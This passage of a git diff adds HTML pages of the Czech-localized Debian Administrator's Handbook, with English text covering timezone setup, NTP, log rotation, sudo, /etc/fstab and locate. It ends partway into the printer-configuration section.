+            href="sect.config-misc.html"><strong>Další</strong>8.9. Other Configurations: Time Synchronization, ...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-misc.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-misc.html
new file mode 100644
index 000000000..05b8e5e24
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-misc.html
@@ -0,0 +1,558 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.config-bootloader.html"
+        title="8.8. Configuring the Bootloader" /><link
+        rel="next"
+        href="sect.kernel-compilation.html"
+        title="8.10. Compiling a Kernel" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.config-misc.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-bootloader.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-compilation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.config-misc"></a>8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…</h2></div></div></div><div
+          class="para">
+			The many elements listed in this section are good to know for anyone who wants to master all aspects of configuration of the GNU/Linux system. They are, however, treated briefly and frequently refer to the documentation.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.timezone"></a>8.9.1. Timezone</h3></div></div></div><a
+            id="id-1.11.13.3.2"
+            class="indexterm"></a><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.symbolic-link"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Symbolic links</strong></p></div></div></div><a
+              id="id-1.11.13.3.3.2"
+              class="indexterm"></a><a
+              id="id-1.11.13.3.3.3"
+              class="indexterm"></a><a
+              id="id-1.11.13.3.3.4"
+              class="indexterm"></a><div
+              class="para">
+				A symbolic link is a pointer to another file. When you access it, the file to which it points is opened. Removal of the link will not cause deletion of the file to which it points. Likewise, it does not have its own set of permissions, but rather retains the permissions of its target. Finally, it can point to any type of file: directories, special files (sockets, named pipes, device files, etc.), even other symbolic links.
+			</div><div
+              class="para">
+				The <code
+                class="command">ln -s <em
+                  class="replaceable">target</em> <em
+                  class="replaceable">link-name</em></code> command creates a symbolic link, named <em
+                class="replaceable">link-name</em>, pointing to <em
+                class="replaceable">target</em>.
+			</div><div
+              class="para">
+				If the target does not exist, then the link is “broken” and accessing it will result in an error indicating that the target file does not exist. If the link points to another link, you will have a “chain” of links that turns into a “cycle” if one of the targets points to one of its predecessors. In this case, accessing one of the links in the cycle will result in a specific error (“too many levels of symbolic links”); this means the kernel gave up after several rounds of the cycle.
+			</div></div><div
+            class="para">
+				The timezone, configured during initial installation, is a configuration item for the <span
+              class="pkg pkg">tzdata</span> package. To modify it, use the <code
+              class="command">dpkg-reconfigure tzdata</code> command, which allows you to choose the timezone to be used in an interactive manner. Its configuration is stored in the <code
+              class="filename">/etc/timezone</code> file. Additionally, the corresponding file in the <code
+              class="filename">/usr/share/zoneinfo</code> directory is copied into <code
+              class="filename">/etc/localtime</code>; this file contains the rules governing the dates where daylight saving time is active, for countries that use it.
+			</div><a
+            id="id-1.11.13.3.5"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.6"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.7"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.8"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.9"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.10"
+            class="indexterm"></a><div
+            class="para">
+				When you need to temporarily change the timezone, use the <code
+              class="varname">TZ</code> environment variable, which takes priority over the configured system default:
+			</div><a
+            id="id-1.11.13.3.12"
+            class="indexterm"></a><a
+            xmlns=""
+            id="screen.tz"></a><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>date</code></strong>
+<code
+              class="computeroutput">Thu Feb 19 11:25:18 CET 2015</code>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>TZ="Pacific/Honolulu" date</code></strong>
+<code
+              class="computeroutput">Thu Feb 19 00:25:21 HST 2015</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> System clock, hardware clock</strong></p></div></div></div><div
+              class="para">
+				There are two time sources in a computer. A computer's motherboard has a hardware clock, called the “CMOS clock”. This clock is not very precise, and provides rather slow access times. The operating system kernel has its own, the software clock, which it keeps up to date with its own means (possibly with the help of time servers, see <a
+                class="xref"
+                href="sect.config-misc.html#sect.time-synchronization">8.9.2 – „Time Synchronization“</a>). This system clock is generally more accurate, especially since it doesn't need access to hardware variables. However, since it only exists in live memory, it is zeroed out every time the machine is booted, contrary to the CMOS clock, which has a battery and therefore “survives” rebooting or halting of the machine. The system clock is, thus, set from the CMOS clock during boot, and the CMOS clock is updated on shutdown (to take into account possible changes or corrections if it has been improperly adjusted).
+			</div><div
+              class="para">
+				In practice, there is a problem, since the CMOS clock is nothing more than a counter and contains no information regarding the time zone. There is a choice to make regarding its interpretation: either the system considers it runs in universal time (UTC, formerly GMT), or in local time. This choice could be a simple shift, but things are actually more complicated: as a result of daylight saving time, this offset is not constant. The result is that the system has no way to determine whether the offset is correct, especially around periods of time change. Since it is always possible to reconstruct local time from universal time and the timezone information, we strongly recommend using the CMOS clock in universal time.
+			</div><div
+              class="para">
+				Unfortunately, Windows systems in their default configuration ignore this recommendation; they keep the CMOS clock on local time, applying time changes when booting the computer by trying to guess during time changes if the change has already been applied or not. This works relatively well, as long as the system has only Windows running on it. But when a computer has several systems (whether it be a “dual-boot” configuration or running other systems via virtual machine), chaos ensues, with no means to determine if the time is correct. If you absolutely must retain Windows on a computer, you should either configure it to keep the CMOS clock as UTC (setting the registry key <code
+                class="literal">HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation\RealTimeIsUniversal</code> to “1” as a DWORD), or use <code
+                class="command">hwclock --localtime --set</code> on the Debian system to set the hardware clock and mark it as tracking the local time (and make sure to manually check your clock in spring and autumn).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.time-synchronization"></a>8.9.2. Time Synchronization</h3></div></div></div><a
+            id="id-1.11.13.4.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.4.3"
+            class="indexterm"></a><div
+            class="para">
+				Time synchronization, which may seem superfluous on a computer, is very important on a network. Since users do not have permissions allowing them to modify the date and time, it is important for this information to be precise to prevent confusion. Furthermore, having all of the computers on a network synchronized allows better cross-referencing of information from logs on different machines. Thus, in the event of an attack, it is easier to reconstruct the chronological sequence of actions on the various machines involved in the compromise. Data collected on several machines for statistical purposes won't make a great deal of sense if they are not synchronized.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> NTP</strong></p></div></div></div><a
+              id="id-1.11.13.4.5.2"
+              class="indexterm"></a><a
+              id="id-1.11.13.4.5.3"
+              class="indexterm"></a><div
+              class="para">
+				NTP (Network Time Protocol) allows a machine to synchronize with others fairly accurately, taking into consideration the delays induced by the transfer of information over the network and other possible offsets.
+			</div><div
+              class="para">
+				While there are numerous NTP servers on the Internet, the more popular ones may be overloaded. This is why we recommend using the <span
+                class="emphasis"><em>pool.ntp.org</em></span> NTP server, which is, in reality, a group of machines that have agreed to serve as public NTP servers. You could even limit use to a sub-group specific to a country, with, for example, <span
+                class="emphasis"><em>us.pool.ntp.org</em></span> for the United States, or <span
+                class="emphasis"><em>ca.pool.ntp.org</em></span> for Canada, etc.
+			</div><div
+              class="para">
+				However, if you manage a large network, it is recommended that you install your own NTP server, which will synchronize with the public servers. In this case, all the other machines on your network can use your internal NTP server instead of increasing the load on the public servers. You will also increase homogeneity with your clocks, since all the machines will be synchronized on the same source, and this source is very close in terms of network transfer times.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ntp-on-workstations"></a>8.9.2.1. For Workstations</h4></div></div></div><div
+              class="para">
+					Since work stations are regularly rebooted (even if only to save energy), synchronizing them by NTP at boot is enough. To do so, simply install the <span
+                class="pkg pkg">ntpdate</span> package. You can change the NTP server used if needed by modifying the <code
+                class="filename">/etc/default/ntpdate</code> file.
+				</div><a
+              id="id-1.11.13.4.6.3"
+              class="indexterm"></a><a
+              id="id-1.11.13.4.6.4"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ntp-on-servers"></a>8.9.2.2. For Servers</h4></div></div></div><div
+              class="para">
+					Servers are only rarely rebooted, and it is very important for their system time to be correct. To permanently maintain correct time, you would install a local NTP server, a service offered in the <span
+                class="pkg pkg">ntp</span> package. In its default configuration, the server will synchronize with <span
+                class="emphasis"><em>pool.ntp.org</em></span> and provide time in response to requests coming from the local network. You can configure it by editing the <code
+                class="filename">/etc/ntp.conf</code> file, the most significant alteration being the NTP server to which it refers. If the network has a lot of servers, it may be interesting to have one local time server which synchronizes with the public servers and is used as a time source by the other servers of the network.
+				</div><a
+              id="id-1.11.13.4.7.3"
+              class="indexterm"></a><a
+              id="id-1.11.13.4.7.4"
+              class="indexterm"></a><a
+              id="id-1.11.13.4.7.5"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> GPS modules and other time sources</strong></p></div></div></div><a
+                id="id-1.11.13.4.7.6.2"
+                class="indexterm"></a><a
+                id="id-1.11.13.4.7.6.3"
+                class="indexterm"></a><div
+                class="para">
+					If time synchronization is particularly crucial to your network, it is possible to equip a server with a GPS module (which will use the time from GPS satellites) or a DCF-77 module (which will sync time with the atomic clock near Frankfurt, Germany). In this case, the configuration of the NTP server is a little more complicated, and prior consultation of the documentation is an absolute necessity.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rotation-logs"></a>8.9.3. Rotating Log Files</h3></div></div></div><a
+            id="id-1.11.13.5.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.5.3"
+            class="indexterm"></a><a
+            id="id-1.11.13.5.4"
+            class="indexterm"></a><a
+            id="id-1.11.13.5.5"
+            class="indexterm"></a><div
+            class="para">
+				Log files can grow, fast, and it is necessary to archive them. The most common scheme is a rotating archive: the log file is regularly archived, and only the latest <em
+              class="replaceable">X</em> archives are retained. <code
+              class="command">logrotate</code>, the program responsible for these rotations, follows directives given in the <code
+              class="filename">/etc/logrotate.conf</code> file and all of the files in the <code
+              class="filename">/etc/logrotate.d/</code> directory. The administrator may modify these files, if they wish to adapt the log rotation policy defined by Debian. The <span
+              class="citerefentry"><span
+                class="refentrytitle">logrotate</span>(1)</span> man page describes all of the options available in these configuration files. You may want to increase the number of files retained in log rotation, or move the log files to a specific directory dedicated to archiving them rather than delete them. You could also send them by e-mail to archive them elsewhere.
+			</div><div
+            class="para">
+				The <code
+              class="command">logrotate</code> program is executed daily by the <code
+              class="command">cron</code> scheduling program (described in <a
+              class="xref"
+              href="sect.task-scheduling-cron-atd.html">9.7 – „Scheduling Tasks with <code
+                class="command">cron</code> and <code
+                class="command">atd</code>“</a>).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.sharing-admin-rights"></a>8.9.4. Sharing Administrator Rights</h3></div></div></div><a
+            id="id-1.11.13.6.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.6.3"
+            class="indexterm"></a><a
+            id="id-1.11.13.6.4"
+            class="indexterm"></a><div
+            class="para">
+				Frequently, several administrators work on the same network. Sharing the root passwords is not very elegant, and opens the door for abuse due to the anonymity such sharing creates. The solution to this problem is the <code
+              class="command">sudo</code> program, which allows certain users to execute certain commands with special rights. In the most common use case, <code
+              class="command">sudo</code> allows a trusted user to execute any command as root. To do so, the user simply executes <code
+              class="command">sudo <em
+                class="replaceable">command</em></code> and authenticates using their personal password.
+			</div><div
+            class="para">
+				When installed, the <span
+              class="pkg pkg">sudo</span> package gives full root rights to members of the <code
+              class="literal">sudo</code> Unix group. To delegate other rights, the administrator must use the <code
+              class="command">visudo</code> command, which allows them to modify the <code
+              class="filename">/etc/sudoers</code> configuration file (here again, this will invoke the <code
+              class="command">vi</code> editor, or any other editor indicated in the <code
+              class="varname">EDITOR</code> environment variable). Adding a line with <code
+              class="literal"><em
+                class="replaceable">username</em> ALL=(ALL) ALL</code> allows the user in question to execute any command as root.
+			</div><a
+            id="id-1.11.13.6.7"
+            class="indexterm"></a><a
+            id="id-1.11.13.6.8"
+            class="indexterm"></a><a
+            id="id-1.11.13.6.9"
+            class="indexterm"></a><div
+            class="para">
+				More sophisticated configurations allow authorization of only specific commands to specific users. All the details of the various possibilities are given in the <span
+              class="citerefentry"><span
+                class="refentrytitle">sudoers</span>(5)</span> man page.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.fstab-mount-points"></a>8.9.5. List of Mount Points</h3></div></div></div><a
+            id="id-1.11.13.7.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.7.3"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Mounting and unmounting</strong></p></div></div></div><div
+              class="para">
+				In a Unix-like system such as Debian, files are organized in a single tree-like hierarchy of directories. The <code
+                class="filename">/</code> directory is called the “root directory”; all additional directories are sub-directories within this root. “Mounting” is the action of including the content of a peripheral device (often a hard drive) into the system's general file tree. As a consequence, if you use a separate hard drive to store users' personal data, this disk will have to be “mounted” in the <code
+                class="filename">/home/</code> directory. The root filesystem is always mounted at boot by the kernel; other devices are often mounted later during the startup sequence or manually with the <code
+                class="command">mount</code> command.
+			</div><a
+              id="id-1.11.13.7.4.3"
+              class="indexterm"></a><div
+              class="para">
+				Some removable devices are automatically mounted when connected, especially when using the GNOME, Plasma or other graphical desktop environments. Others have to be mounted manually by the user. Likewise, they must be unmounted (removed from the file tree). Normal users do not usually have permission to execute the <code
+                class="command">mount</code> and <code
+                class="command">umount</code> commands. The administrator can, however, authorize these operations (independently for each mount point) by including the <code
+                class="literal">user</code> option in the <code
+                class="filename">/etc/fstab</code> file.
+			</div><div
+              class="para">
+				The <code
+                class="command">mount</code> command can be used without arguments (it then lists all mounted filesystems). The following parameters are required to mount or unmount a device. For the complete list, please refer to the corresponding man pages, <span
+                class="citerefentry"><span
+                  class="refentrytitle">mount</span>(8)</span> and <span
+                class="citerefentry"><span
+                  class="refentrytitle">umount</span>(8)</span>. For simple cases, the syntax is simple too: for example, to mount the <code
+                class="filename">/dev/sdc1</code> partition, which has an ext3 filesystem, into the <code
+                class="filename">/mnt/tmp/</code> directory, you would simply run <code
+                class="command">mount -t ext3 /dev/sdc1 /mnt/tmp/</code>.
+			</div></div><div
+            class="para">
+				The <code
+              class="filename">/etc/fstab</code> file gives a list of all possible mounts that happen either automatically on boot or manually for removable storage devices. Each mount point is described by a line with several space-separated fields: <a
+              id="id-1.11.13.7.5.2"
+              class="indexterm"></a> <a
+              id="id-1.11.13.7.5.3"
+              class="indexterm"></a>
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						file system: this indicates where the filesystem to be mounted can be found, it can be a local device (hard drive partition, CD-ROM) or a remote filesystem (such as NFS).
+					</div><div
+                  class="para">
+						This field is frequently replaced with the unique ID of the filesystem (which you can determine with <code
+                    class="command">blkid <strong
+                      class="userinput"><code>device</code></strong></code>) prefixed with <code
+                    class="literal">UUID=</code>. This guards against a change in the name of the device in the event of addition or removal of disks, or if disks are detected in a different order.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						mount point: this is the location on the local filesystem where the device, remote system, or partition will be mounted.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						type: this field defines the filesystem used on the mounted device. <code
+                    class="literal">ext4</code>, <code
+                    class="literal">ext3</code>, <code
+                    class="literal">vfat</code>, <code
+                    class="literal">ntfs</code>, <code
+                    class="literal">btrfs</code>, <code
+                    class="literal">xfs</code> are a few examples.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>BACK TO BASICS</em></span> NFS, a network filesystem</strong></p></div></div></div><div
+                    class="para">
+						NFS is a network filesystem; under Linux, it allows transparent access to remote files by including them in the local filesystem.
+					</div></div><div
+                  class="para">
+						A complete list of known filesystems is available in the <span
+                    class="citerefentry"><span
+                      class="refentrytitle">mount</span>(8)</span> man page. The <code
+                    class="literal">swap</code> special value is for swap partitions; the <code
+                    class="literal">auto</code> special value tells the <code
+                    class="command">mount</code> program to automatically detect the filesystem (which is especially useful for disk readers and USB keys, since each one might have a different filesystem);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						options: there are many of them, depending on the filesystem, and they are documented in the <code
+                    class="command">mount</code> man page. The most common are
+					</div><div
+                  class="itemizedlist"><ul><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">rw</code> or <code
+                          class="literal">ro</code>, meaning, respectively, that the device will be mounted with read/write or read-only permissions.
+							</div></li><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">noauto</code> deactivates automatic mounting on boot.
+							</div></li><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">nofail</code> allows the boot to proceed even when the device is not present. Make sure to put this option for external drives that might be unplugged when you boot, because <code
+                          class="command">systemd</code> really ensures that all mount points that must be automatically mounted are actually mounted before letting the boot process continue to its end. Note that you can combine this with <code
+                          class="literal">x-systemd.device-timeout=5s</code> to tell <code
+                          class="command">systemd</code> to not wait more than 5 seconds for the device to appear (see <span
+                          class="citerefentry"><span
+                            class="refentrytitle">systemd.mount</span>(5)</span>).
+							</div></li><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">user</code> authorizes all users to mount this filesystem (an operation which would otherwise be restricted to the root user).
+							</div></li><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">defaults</code> means the group of default options: <code
+                          class="literal">rw</code>, <code
+                          class="literal">suid</code>, <code
+                          class="literal">dev</code>, <code
+                          class="literal">exec</code>, <code
+                          class="literal">auto</code>, <code
+                          class="literal">nouser</code> and <code
+                          class="literal">async</code>, each of which can be individually disabled after <code
+                          class="literal">defaults</code> by adding <code
+                          class="literal">nosuid</code>, <code
+                          class="literal">nodev</code> and so on to block <code
+                          class="literal">suid</code>, <code
+                          class="literal">dev</code> and so on. Adding the <code
+                          class="literal">user</code> option reactivates it, since <code
+                          class="literal">defaults</code> includes <code
+                          class="literal">nouser</code>.
+							</div></li></ul></div></li><li
+                class="listitem"><div
+                  class="para">
+						dump: this field is almost always set to <code
+                    class="literal">0</code>. When it is <code
+                    class="literal">1</code>, it tells the <code
+                    class="command">dump</code> tool that the partition contains data that is to be backed up.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						pass: this last field indicates whether the integrity of the filesystem should be checked on boot, and in which order this check should be executed. If it is <code
+                    class="literal">0</code>, no check is conducted. The root filesystem should have the value <code
+                    class="literal">1</code>, while other permanent filesystems get the value <code
+                    class="literal">2</code>.
+					</div></li></ul></div><div
+            class="example"><a
+              xmlns=""
+              id="example.fstab"></a><p
+              class="title"><strong>Příklad 8.6. Example <code
+                  class="filename">/etc/fstab</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+# /etc/fstab: static file system information.
+#
+# &lt;file system&gt; &lt;mount point&gt;   &lt;type&gt;  &lt;options&gt;       &lt;dump&gt;  &lt;pass&gt;
+proc            /proc           proc    defaults        0       0
+# / was on /dev/sda1 during installation
+UUID=c964222e-6af1-4985-be04-19d7c764d0a7 / ext3 errors=remount-ro 0 1
+# swap was on /dev/sda5 during installation
+UUID=ee880013-0f63-4251-b5c6-b771f53bd90e none swap sw  0       0
+/dev/scd0       /media/cdrom0   udf,iso9660 user,noauto 0       0
+/dev/fd0        /media/floppy   auto    rw,user,noauto  0       0
+arrakis:/shared /shared         nfs     defaults        0       0
+</pre></div></div><div
+            class="para">
+				The last entry in this example corresponds to a network filesystem (NFS): the <code
+              class="filename">/shared/</code> directory on the <span
+              class="emphasis"><em>arrakis</em></span> server is mounted at <code
+              class="filename">/shared/</code> on the local machine. The format of the <code
+              class="filename">/etc/fstab</code> file is documented on the <span
+              class="citerefentry"><span
+                class="refentrytitle">fstab</span>(5)</span> man page.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Auto-mounting</strong></p></div></div></div><div
+              class="para">
+				systemd is able to manage automount points: those are filesystems that are mounted on-demand when a user attempts to access their target mount points. It can also unmount these filesystems when no process is accessing them any longer.
+			</div><div
+              class="para">
+				Like most concepts in systemd, automount points are managed with dedicated units (using the <code
+                class="literal">.automount</code> suffix). See <span
+                class="citerefentry"><span
+                  class="refentrytitle">systemd.automount</span>(5)</span> for their precise syntax.
+			</div><a
+              id="id-1.11.13.7.9.4"
+              class="indexterm"></a><a
+              id="id-1.11.13.7.9.5"
+              class="indexterm"></a><a
+              id="id-1.11.13.7.9.6"
+              class="indexterm"></a><a
+              id="id-1.11.13.7.9.7"
+              class="indexterm"></a><a
+              id="id-1.11.13.7.9.8"
+              class="indexterm"></a><div
+              class="para">
+				Other auto-mounting utilities exist, such as <code
+                class="command">automount</code> in the <span
+                class="pkg pkg">autofs</span> package or <code
+                class="command">amd</code> in the <span
+                class="pkg pkg">am-utils</span>.
+			</div><div
+              class="para">
+				Note also that GNOME, Plasma, and other graphical desktop environments work together with <span
+                class="emphasis"><em>udisks</em></span>, and can automatically mount removable media when they are connected.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.locate-updatedb"></a>8.9.6. <code
+                    class="command">locate</code> and <code
+                    class="command">updatedb</code></h3></div></div></div><a
+            id="id-1.11.13.8.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.8.3"
+            class="indexterm"></a><a
+            id="id-1.11.13.8.4"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="command">locate</code> command can find the location of a file when you only know part of the name. It sends a result almost instantaneously, since it consults a database that stores the location of all the files on the system; this database is updated daily by the <code
+              class="command">updatedb</code> command. There are multiple implementations of the <code
+              class="command">locate</code> command and Debian picked <span
+              class="pkg pkg">mlocate</span> for its standard system.
+			</div><div
+            class="para">
+				<code
+              class="command">mlocate</code> is smart enough to only return files which are accessible to the user running the command even though it uses a database that knows about all files on the system (since its <code
+              class="command">updatedb</code> implementation runs with root rights). For extra safety, the administrator can use <code
+              class="varname">PRUNEDPATHS</code> in <code
+              class="filename">/etc/updatedb.conf</code> to exclude some directories from being indexed.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-bootloader.html"><strong>Předcházející</strong>8.8. Configuring the Bootloader</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-compilation.html"><strong>Další</strong>8.10. Compiling a Kernel</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-printing.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-printing.html
new file mode 100644
index 000000000..f6d79fbb2
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-printing.html
@@ -0,0 +1,150 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.7. Printer Configuration</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.shell-environment.html"
+        title="8.6. Shell Environment" /><link
+        rel="next"
+        href="sect.config-bootloader.html"
+        title="8.8. Configuring the Bootloader" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.config-printing.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.shell-environment.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-bootloader.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.config-printing"></a>8.7. Printer Configuration</h2></div></div></div><a
+          id="id-1.11.11.2"
+          class="indexterm"></a><a
+          id="id-1.11.11.3"
+          class="indexterm"></a><div
+          class="para">
+			Printer configuration used to cause a great many headaches for administrators and users alike. These headaches are now mostly a thing of the past, thanks to <span
+            class="pkg pkg">cups</span>, the free print server using the IPP protocol (Internet Printing Protocol).
+		</div><a
+          id="id-1.11.11.5"
+          class="indexterm"></a><a
+          id="id-1.11.11.6"
+          class="indexterm"></a><a
+          id="id-1.11.11.7"
+          class="indexterm"></a><div
+          class="para">
+			This program is divided over several Debian packages: <span
+            class="pkg pkg">cups</span> is the central print server; <span
+            class="pkg pkg">cups-bsd</span> is a compatibility layer allowing use of commands from the traditional BSD printing system (<code
+            class="command">lpd</code> daemon, <code
+            class="command">lpr</code> and <code
+            class="command">lpq</code> commands, etc.); <span
+            class="pkg pkg">cups-client</span> contains a group of programs to interact with the server (block or unblock a printer, view or delete print jobs in progress, etc.); and finally, <span
+            class="pkg pkg">printer-driver-gutenprint</span> contains a collection of additional printer drivers for <code
+            class="command">cups</code>.
+		</div><a
+          id="id-1.11.11.9"
+          class="indexterm"></a><a
+          id="id-1.11.11.10"
+          class="indexterm"></a><a
+          id="id-1.11.11.11"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMMUNITY</em></span> CUPS</strong></p></div></div></div><a
+            id="id-1.11.11.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.11.12.3"
+            class="indexterm"></a><div
+            class="para">
